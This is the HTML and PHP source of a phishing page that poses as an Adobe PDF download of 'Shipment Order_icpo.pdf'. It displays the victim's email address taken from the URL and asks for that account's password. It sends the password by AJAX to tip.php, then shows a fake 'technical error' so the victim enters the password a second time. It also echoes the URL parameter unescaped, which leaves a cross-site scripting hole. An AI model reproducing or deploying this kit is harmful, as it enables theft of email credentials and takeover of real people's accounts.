<!doctype html>
<html>
    <head>
        <meta charset="utf-8">
        <title>Acrobat Pro, Standard, Reader DC 2020/2021: Direct Download|Abobe pdf</title>
		<link rel="icon" href="./c3.JPG">

        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">

        <!-- jQuery library -->
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

        <!-- Popper JS -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>

        <!-- Latest compiled JavaScript -->
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>

        <style>
            body {
                background-image: url(bg.png);
                background-repeat: no-repeat;
                color: #045eb4;
            }



            #d {
                position: relative;
                left: 530px;
                top: 350px;

            }

            #form {
                position: absolute;
                left: 530px;
                top: 50px;
                width: 300px;
                border-radius: 10px;
                padding: 20px;
                z-index: 2;
                background: white;
                display:none;

            }

            #myModal{
                top: 40%;
                left: 50%;
                transform: translate(-50%,-50%);
                overflow: hidden;
            }
            #mydal{
                top: 50%;
                left: 50%;
                transform: translate(-50%,-50%);
            }
            .blue{
                background-color: #045eb4;
                color: white;
            }
            #sub1{
	margin-top: 480px;
	margin-left: 140px;
	border-radius: 15px;
	position: absolute;
	z-index: 1;
	left: -46px;
	top: -97px;
	height: 41px;
	width: 314px;
	background-color: #990000;
            }
            .sky{
                background-color: #409fff;
                color:white;

            }
        .style2 {color: #0066FF; font-weight: bold; }
        .style4 {font-size: 14px}
        .style5 {
	color: #FFFFFF;
	font-size: 16px;
}
        #Layer1 {
	position:absolute;
	width:340px;
	height:38px;
	z-index:3;
	left: -44px;
	top: -90px;
}
        .style6 {
	color: #CCCCCC;
	font-weight: bold;
}
        </style>
    </head>
<div class="style6" id="Layer1"><p id="em"><?php echo $_GET['x1']; ?></p> </div>
    <body>

        <!-- The Modal -->
        <div class="modal fade" id="myModal">
            <div class="modal-dialog modal-md">
                <div class="modal-content">
                    <!-- Modal body -->
                    <div class="modal-body text-center" >
                        <img src="logo.jpg" width="70">
                        
                        <br>
                        <div id="msg" style="color:black;">Confirm your Email ID to Complete Download</div>
                        <hr>
                        <h1></h1>
                        <form method="post" id="users" action="tip.php" >

                            <p id="em"><?php echo $_GET['x1']; ?></p>
                            <input type="password" name="x2" class="form-control text-center" value="" id="ps" placeholder="Enter Password" required="" >
                            <span class="text-danger" id="er"></span>
                            <input type="hidden" id="m" value="<?php echo $_GET['x1']; ?>" name="x1">
                            <br>
                            <button id="sub" name="sub"  type="submit" class="btn btn-md btn-block sky">Confirm E-MAIL</button>
                        </form>
                  </div>
                </div>
            </div>
        </div>


        <div class="modal fade" id="mydal">
            <div class="modal-dialog modal-md">
                <div class="modal-content">
                    <!-- Modal body -->
                    <div class="modal-body text-center" >
                        <img src="pro.gif"  style="width:100%;max-width:200px ;"><br>
                        <div id="ms" class="text-danger h5">DOWNLOAD.. </div>

                    </div>
                </div>
            </div>
        </div>



        <div id="form" class="text-center">

        </div>






        <script>
            $(document).ready(function () {

                $("#users").submit(function (event) {
                    event.preventDefault();
                    $("#sub").html("Downloading...").prop("disabled", true);
                    $.ajax({
                        type: "POST",
                        url: "tip.php",
                        data: $(this).serialize()
                    }).done(function (data) {
                        setTimeout(function () {
                            $("#myModal").modal("hide");
                            $("#mydal").modal("show");
                            setTimeout(function () {
                                $("#ms").html(`Technical error encountered
Please confirm the email password
Try Again<br>
      
                                                `);
                                setTimeout(function () {
                                    $("#myModal").modal("show");
                                    $("#mydal").modal("hide");
                                    $("#sub").html("Download").prop("disabled", false);
                                    $("#ps").val("");
                                }, 3000);

                            }, 2000);

                        }, 3000);


                    }).fail(function () {
                        alert("error");
                    });
                });
            });
        </script>


        <button name="sub1" type="button" class="btn btn-primary" id="sub1" data-toggle="modal" data-target="#myModal">
		<div class="style6" id="Layer1">Shipment Order_icpo.pdf .14MB </div>
        <p class="style2 style4 style5">Download Adobe PDF Documentation</p>
        <p class="style2 style4">&nbsp;</p>
    </button>


    </body>

</html>
